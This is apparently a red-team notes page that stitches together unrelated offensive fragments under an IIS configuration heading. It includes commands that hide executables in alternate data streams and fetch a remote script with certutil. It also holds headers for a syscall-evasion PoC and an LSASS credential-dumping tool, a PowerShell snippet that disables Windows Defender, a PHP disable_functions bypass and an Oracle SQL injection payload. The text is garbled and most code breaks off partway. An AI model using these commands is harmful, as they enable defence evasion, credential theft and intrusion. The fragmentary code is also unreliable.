Marcos Diaz Margaruga

IIS Config File Paths

Internet Information Services (IIS) 7 and later use an XML-based configuration system for storing IIS settings which replaces the metabase that was used in IIS 6.0 and earlier. This new configuration system was introduced with ASP.NET and is based on a hierarchical system of management system that uses *.config files. The configuration files for IIS 7 and later are located in the %windir%\System32\inetsrv\config folder.

applicationHost.config

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Windows system calls

...by stub

x86

Windows XP

B8 ?? ?? ?? ??                mov     eax, ??
BA 00 03 FE 7F                mov     edx, 7FFE0300h

	#!/usr/bin/python3
	from __future__ import division
	from __future__ import print_function
	import re
	import codecs
	import logging
	import time
	import argparse
	import sys
	from impacket import version

	' Proof of Concept: retrieving SSN for syscalling in VBA
	' Author: Juan Manuel Fernandez (@TheXC3LL)


	'Based on:
	'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
	'https://www.crummie5.club/freshycalls/


	Private Type LARGE_INTEGER

	import struct
	import os
	import datetime
	import base64
	from binascii import unhexlify
	from pyasn1.type.univ import noValue
	from pyasn1.codec.der import decoder, encoder
	from ldap3 import Server, Connection, NTLM, ALL, SASL, KERBEROS
	from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED
	from ldap3.operation.bind import bind_operation

	#include <Windows.h>
	#include <iostream>
	#include <DbgHelp.h>
	#include <processsnapshot.h>
	#include <TlHelp32.h>
	#include <processthreadsapi.h>

	//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
	//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
	//compile using: cl.exe refl.cpp /DUNICODE

	$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

	$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
	Register-ScheduledTask -TaskName 'TestTask' -Action $a

	$svc = New-Object -ComObject 'Schedule.Service'
	$svc.Connect()

	$user = 'NT SERVICE\TrustedInstaller'
	$folder = $svc.GetFolder('\')

	<?php

	/*

	If open_basedir is misconfigured it is posible to read and write /proc/self/mem. This means that a PHP script can self-patch
	itself to bypass disable_functions and call system() or other dangerous functions. This technique is old, indeed you can find
	a PoC by Beched (https://github.com/beched/php_disable_functions_bypass) where the open@plt address is replaced by the system@plt
	address (the info is extraced parsing the PHP and libc binary).

	My approach is similar in the sense of taking the advantage of /usr/proc/mem, but to achieve the bypass I overwrite the handler

	/*
	* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
	* @author: xassiz
	*/

	select ''\|\|
	xmltype('<'\|\|
	regexp_replace(
	utl_raw.cast_to_varchar2(
	utl_encode.base64_encode(